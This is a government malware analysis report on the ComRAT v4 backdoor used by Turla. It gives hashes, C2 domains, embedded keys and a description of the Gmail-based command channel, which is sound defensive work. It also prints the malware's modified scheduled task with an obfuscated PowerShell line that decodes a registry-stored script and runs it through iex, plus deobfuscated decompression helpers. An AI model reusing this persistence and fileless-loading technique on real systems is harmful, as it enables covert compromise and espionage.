Malware Analysis Report (AR20-303A)

This report is provided "as is" for informational purposes only. The Department of Homeland Security (DHS) does not provide any warranties of any kind regarding any information contained herein. The DHS does not endorse any commercial product or service referenced in this bulletin or otherwise.

This document is marked TLP:WHITE--Disclosure is not limited. Sources may use TLP:WHITE when information carries minimal or no foreseeable risk of misuse, in accordance with applicable rules and procedures for public release. Subject to standard copyright rules, TLP:WHITE information may be distributed without restriction. For more information on the Traffic Light Protocol (TLP), see http://www.us-cert.gov/tlp.

Description

This Malware Analysis Report (MAR) is the result of analytic efforts between the Cybersecurity and Infrastructure Security Agency (CISA), the Cyber National Mission Force (CNMF), and the Federal Bureau of Investigation (FBI). The malware variant, known as ComRAT, has been used by Turla, a Russian-sponsored Advanced Persistent Threat (APT) actor. CISA, CNMF, and FBI are distributing this MAR to enable network defense and reduced exposure to malicious activity. This MAR includes suggested response actions and recommended mitigation techniques.

FBI has high-confidence that Russian-sponsored APT actor Turla, which is an espionage group active for at least a decade, is using ComRAT malware to exploit victim networks. The group is well known for its custom tools and targeted operations.

This report analyzes a PowerShell script that installs a PowerShell script, which will decode and load a 64-bit dynamic-link library (DLL) identified as ComRAT version 4. This new variant of ComRAT contains embedded 32-bit and 64-bit DLLs used as communication modules. The communication module (32-bit or 64-bit DLL) is injected into the victim systemís default browser. The ComRATv4 file and the communication module communicate with each other using a named pipe. The named pipe is used to send Hypertext Transfer Protocol (HTTP) requests and receive HTTP responses to and from the communication module for backdoor commands. It is designed to use a Gmail web interface to receive commands and exfiltrate data. The ComRAT v4 file contains a Virtual File System (VFS) in File Allocation Table 16 (FAT16) format, which includes the configuration and logs files.

Users or administrators should flag activity associated with the malware and report the activity to the CISA or the FBI Cyber Watch (CyWatch), and give the activity the highest priority for enhanced mitigation. For more information on malicious cyber activity, please visit https://us-cert.cisa.gov/

For a downloadable copy of IOCs, see: MAR-10310246-2.v1.WHITE.stix.

Submitted Files (5)

00352afc7e7863530e4d68be35ae8b60261fc57560167645697b7bfc0ac0e93d (Communication_module_32.dll)

134919151466c9292bdcb7c24c32c841a5183d880072b0ad5e8b3a3a830afef8 (corrected.ps1)

166b1fb3d34b32f1807c710aaa435d181aedbded1e7b4539ffa931c2b2cdd405 (Communication_module_64.dll)

44d6d67b5328a4d73f72d8a0f9d39fe4bb6539609f90f169483936a8b3b88316 (ComRATv4.exe)

a3170c32c09fc85cdda778a5c20a3dab144b6d1dd9996ba8340866e0081c7642 (Decode_PowerShell.ps1)

Domains (6)

branter.tk

bronerg.tk

crusider.tk

duke6.tk

sanitar.ml

wekanda.tk

134919151466c9292bdcb7c24c32c841a5183d880072b0ad5e8b3a3a830afef8

Tags

dropper

Details

Antivirus

No matches found.

YARA Rules

No matches found.

ssdeep Matches

No matches found.

Relationships

Description

This file is a heavily encoded malicious PowerShell script. It is designed to install a malicious PowerShell script into a registry on the victim system. This malicious script also modifies the following scheduled task on the victim's system:

—Begin Modified Scheduled Task—
C:\Windows\System32\Tasks\Microsoft\Windows\Customer Experience Improvement Program\Consolidator
—End Modified Scheduled Task—

The modification of this scheduled task causes the installed malicious PowerShell script to be executed. Displayed below is the original scheduled task:

—Begin Original Scheduled Task—
<?xml version="1.0" encoding="UTF-16"?>
<Task xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
<RegistrationInfo>
   <Version>1.0</Version>
   <SecurityDescriptor>D:(A;OICI;FA;;;BA)(A;OICI;FA;;;SY)(A;OICI;GRGX;;;AU)</SecurityDescriptor>
   <Source>$(@%systemRoot%\system32\wsqmcons.exe,-106)</Source>
   <Author>$(@%systemRoot%\system32\wsqmcons.exe,-108)</Author>
   <Description>$(@%systemRoot%\system32\wsqmcons.exe,-107)</Description>
   <URI>\Microsoft\Windows\Customer Experience Improvement Program\Consolidator</URI>
</RegistrationInfo>
<Principals>
   <Principal id="WinSQMAccount">
    <UserId>S-1-5-18</UserId>
   </Principal>
</Principals>
<Settings>
   <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>
   <StopIfGoingOnBatteries>false</StopIfGoingOnBatteries>
   <MultipleInstancesPolicy>IgnoreNew</MultipleInstancesPolicy>
   <StartWhenAvailable>true</StartWhenAvailable>
   <IdleSettings>
    <StopOnIdleEnd>true</StopOnIdleEnd>
    <RestartOnIdle>false</RestartOnIdle>
   </IdleSettings>
   <UseUnifiedSchedulingEngine>true</UseUnifiedSchedulingEngine>
</Settings>
<Triggers>
   <TimeTrigger>
    <StartBoundary>2004-01-02T00:00:00</StartBoundary>
    <Repetition>
       <Interval>PT6H</Interval>
    </Repetition>
   </TimeTrigger>
</Triggers>
<Actions Context="WinSQMAccount">
   <Exec>
    <Command>%SystemRoot%\System32\wsqmcons.exe</Command>
   </Exec>
</Actions>
</Task>
—End Original Scheduled Task—

The scheduled task is then modified by this malicious PowerShell script. Displayed below is the modified scheduled task:

—Begin Modified Scheduled Task—
<?xml version="1.0" encoding="UTF-16"?>
<Task version="1.3" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
<RegistrationInfo>
   <Source>$(@%systemRoot%\system32\wsqmcons.exe,-106)</Source>
   <Author>$(@%systemRoot%\system32\wsqmcons.exe,-108)</Author>
   <Version>1.0</Version>
   <Description>$(@%systemRoot%\system32\wsqmcons.exe,-107)</Description>
   <URI>\Microsoft\Windows\Customer Experience Improvement Program\Consolidator</URI>
   <SecurityDescriptor>D:(A;OICI;FA;;;BA)(A;OICI;FA;;;SY)(A;OICI;GRGX;;;AU)</SecurityDescriptor>
</RegistrationInfo>
<Triggers>
   <TimeTrigger>
    <Repetition>
       <Interval>PT6H</Interval>
       <StopAtDurationEnd>false</StopAtDurationEnd>
    </Repetition>
    <StartBoundary>2004-01-02T00:00:00</StartBoundary>
    <Enabled>true</Enabled>
   </TimeTrigger>
   <LogonTrigger>
    <Enabled>true</Enabled>
   </LogonTrigger>
</Triggers>
<Principals>
   <Principal id="WinSQMAccount">
    <RunLevel>LeastPrivilege</RunLevel>
    <UserId>SYSTEM</UserId>
   </Principal>
</Principals>
<Settings>
   <MultipleInstancesPolicy>IgnoreNew</MultipleInstancesPolicy>
   <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>
   <StopIfGoingOnBatteries>false</StopIfGoingOnBatteries>
   <AllowHardTerminate>true</AllowHardTerminate>
   <StartWhenAvailable>true</StartWhenAvailable>
   <RunOnlyIfNetworkAvailable>false</RunOnlyIfNetworkAvailable>
   <IdleSettings>
    <StopOnIdleEnd>true</StopOnIdleEnd>
    <RestartOnIdle>false</RestartOnIdle>
   </IdleSettings>
   <AllowStartOnDemand>true</AllowStartOnDemand>
   <Enabled>true</Enabled>
   <Hidden>false</Hidden>
   <RunOnlyIfIdle>false</RunOnlyIfIdle>
   <DisallowStartOnRemoteAppSession>false</DisallowStartOnRemoteAppSession>
   <UseUnifiedSchedulingEngine>true</UseUnifiedSchedulingEngine>
   <WakeToRun>false</WakeToRun>
   <ExecutionTimeLimit>PT72H</ExecutionTimeLimit>
   <Priority>7</Priority>
</Settings>
<Actions Context="WinSQMAccount">
   <Exec>
    <Command>cmd.exe</Command>
    <Arguments>/c "%SystemRoot%\System32\wsqmcons.exe &amp; PowerShell.exe -v 2 "$GS459ea = 'KVYYOBBA4331110uhyicnoor';
[Text.Encoding]::ASCII.GetString([Convert]::\"Fr`omBa`se6`4Str`ing\"((gp HKLM:\SOFTWARE\Microsoft\SQMClient\Windows).WSqmCons))|iex;
""</Arguments>
   </Exec>
</Actions>
</Task>
—End Modified Scheduled Task—

   The modification of the scheduled task illustrated below indicates the primary purpose of this task modification is to decode and execute a PowerShell script contained within the registry key HKLM:\SOFTWARE\Microsoft\SQMClient\Windows = WSqmCons:

—Begin Specific Scheduled Task Module—
<Actions Context="WinSQMAccount">
   <Exec>
    <Command>cmd.exe</Command>
    <Arguments>/c "%SystemRoot%\System32\wsqmcons.exe &amp; PowerShell.exe -v 2 "$GS459ea = 'KVYYOBBA4331110uhyicnoor';
[Text.Encoding]::ASCII.GetString([Convert]::\"Fr`omBa`se6`4Str`ing\"((gp HKLM:\SOFTWARE\Microsoft\SQMClient\Windows).WSqmCons))|iex;
""</Arguments>
—End Specific Scheduled Task Module—

This malicious script installs a PowerShell script (a3170c32c09fc85cdda778a5c20a3dab144b6d1dd9996ba8340866e0081c7642) into the “WsqmCons” registry key. The primary purpose of the newly installed PowerShell is to decode and load a malicious DLL, identified as ComRat v4 (44d6d67b5328a4d73f72d8a0f9d39fe4bb6539609f90f169483936a8b3b88316) onto the victim's system.

a3170c32c09fc85cdda778a5c20a3dab144b6d1dd9996ba8340866e0081c7642

Tags

trojan

Details

Antivirus

YARA Rules

No matches found.

ssdeep Matches

No matches found.

Relationships

Description

This heavily encoded PowerShell script is installed by the malicious script “corrected.ps1” (134919151466c9292bdcb7c24c32c841a5183d880072b0ad5e8b3a3a830afef8). It is designed to decode and load an embedded DLL which has been identified as a variant of the malware known as ComRat v4 “ComRATv4.exe (44d6d67b5328a4d73f72d8a0f9d39fe4bb6539609f90f169483936a8b3b88316).

Removal of some of the PowerShell obfuscation reveals the functions illustrated below. These functions are used to decompress the embedded DLL, before it is loaded on the target system:

—Begin PowerShell Helper Functions—
   using System;
   using System.IO;
   using System.IO.Compression;

   public static class CD475bjf{
       public static void DBQ800fc(Stream input, Stream output){byte[] buffer = new byte[16 * 1024];
       int bytesRead;
       while((bytesRead = input.Read(buffer, 0, buffer.Length)) > 0){
           output.Write(buffer, 0, bytesRead);
       }}}
   
   public static class MAE38aee{
   
       public static byte[] JZ653jdh(byte[] arrayToCompress){
           using (MemoryStream outStream = new MemoryStream()){using (GZipStream tinyStream = new GZipStream(outStream, CompressionMode.Compress))using (MemoryStream mStream = new MemoryStream(arrayToCompress))CD475bjf.DBQ800fc(mStream, tinyStream);
       return outStream.ToArray();
   }}
   
       public static byte[] PGN255ij(byte[] arrayToDecompress){        
           using (MemoryStream inStream = new MemoryStream(arrayToDecompress))using (GZipStream bigStream = new GZipStream(inStream, CompressionMode.Decompress))using (MemoryStream bigStreamOut = new MemoryStream()){CD475bjf.DBQ800fc(bigStream, bigStreamOut);
       return bigStreamOut.ToArray();
   }}}

#decode base64 above
$decompress = [Convert]::FromBase64String($decompressbase64);

#create another text object for use later
$NS70gea = New-Object System.Text.ASCIIEncoding;

#convert base64 decoded value to string
$decompress = $NS70gea.GetString($decompress,0,$decompress.Length);
—End PowerShell Helper Functions—

Figure 1 illustrates a part of the payload embedded within this malicious script. The encoded PowerShell script contains an embedded function named “Run”, that can load a DLL directly from memory and inject it into a remote process (Figure 2). The PowerShell script injects the embedded ComRAT DLL (44d6d67b5328a4d73f72d8a0f9d39fe4bb6539609f90f169483936a8b3b88316) into the Windows Explorer process.

Screenshots

44d6d67b5328a4d73f72d8a0f9d39fe4bb6539609f90f169483936a8b3b88316

Tags

trojan

Details

Antivirus

YARA Rules

No matches found.

ssdeep Matches

No matches found.

PE Metadata

PE Sections

Relationships

Description

This application is a 32-bit Windows DLL that has been identified as a module of ComRAT v4. The DLL is loaded into Windows Explorer (Explorer.exe) by a ComRAT PowerShell loader (a3170c32c09fc85cdda778a5c20a3dab144b6d1dd9996ba8340866e0081c7642). When executed, it checks the victim's system day\time and it performs code execution between 9AM to 5PM Monday through Friday. During execution, it installs the following files into the %TEMP% folder:

--Begin files--
"%TEMP%\iecache.bin" ==> an AES-256-XTS encrypted VFS FAT16 format, containing the malware configuration and the logs files. (The encryption key is generated during runtime and stored in the Windows registry).
"%TEMP%\FSAPIDebugLogFile.txt
--End files--

The malware injects an embedded communication module (00352afc7e7863530e4d68be35ae8b60261fc57560167645697b7bfc0ac0e93d or (166b1fb3d34b32f1807c710aaa435d181aedbded1e7b4539ffa931c2b2cdd405) into the victim system's default browser and executes it. This file and the communication module communicate with each other using a named pipe. The malware uses the named pipe to send HTTP requests and receive HTTP responses to and from the communication module for backdoor commands. It is designed to use the Gmail web interface to receive commands and exfiltrate data.

Illustrated below are sample data observed in the decrypted VFS in FAT16 format. Some of these files can be updated in the VFS using backdoor commands.

--Begin sample data in the VFS --
"/etc/pal/" contains a list of C2 domains: "bronerg.tk|crusider.tk|duke6.tk"
"/etc/gal.bin" contains a list of C2 domains: "sanitar.ml|wekanda.tk|branter.tk"
"/etc/pki/aes_key.pki" : Contains the Advanced Encryption Standard (AES) encryption keys for the C2 communications:

--Begin AES key--
4F8112E9E5AB5391C584D567B58E539F0400094A83EA0C2DDC7FA455FCF447B1
--End AES key--

"/etc/pki/public_cert.pki" contains the Rivest–Shamir–Adleman (RSA) encryption key used for the C2 communications:

--Begin RSA key--
BE51E00093CEB0A5FCAE59EB4EEEB3079D1CB17FC195321587CB513003826917B0BC13EB3B9A4209A4FFAF19C07249D360F447A6FAE3936612516A152619B800C4BE12FFF7077D7AF959ABBFD0A1BC06CD3B9D8DBC079307D79B78E4C7F114DE3B530DF40E40C14299D47CD6530A765B1F2717EAA66AD139B3F6728AFFFC5B6AB3E2B36FB062AD167E2B4450A295038A211E0A8E8BFE01FE338ACF883518099663E95B6266AB037224A32853002A47248012567455AC75939FDFC4018D86C2A6D72770887A8FE0678F5E7BC527FB4787D70923FC6909ACF8DC651F93B5E537ABF860B3262723FB2181E9132E381D892A8864BAB38687231B1E47C00BF10BC445010001
--End RSA key--

It uses the public key cryptography with RSA and AES encrypted email attachments for its Gmail C2 channel.
"/etc/mail/subj_dict" contains the the Subject "Re: |RE: |FW: |FWD: | Fw: | Fwd:| FYI: |FYIP |NRN: | NT: | N/T | n/t| NB |NM| n/m |N/M: |*n/m*"

"/etc/php_storage/GET/DEF/server.txt " and "/etc/php_storage/POST/DEF/server.txt" contains server IP "172.22.150.125".
--End sample data in the VFS --

Screenshots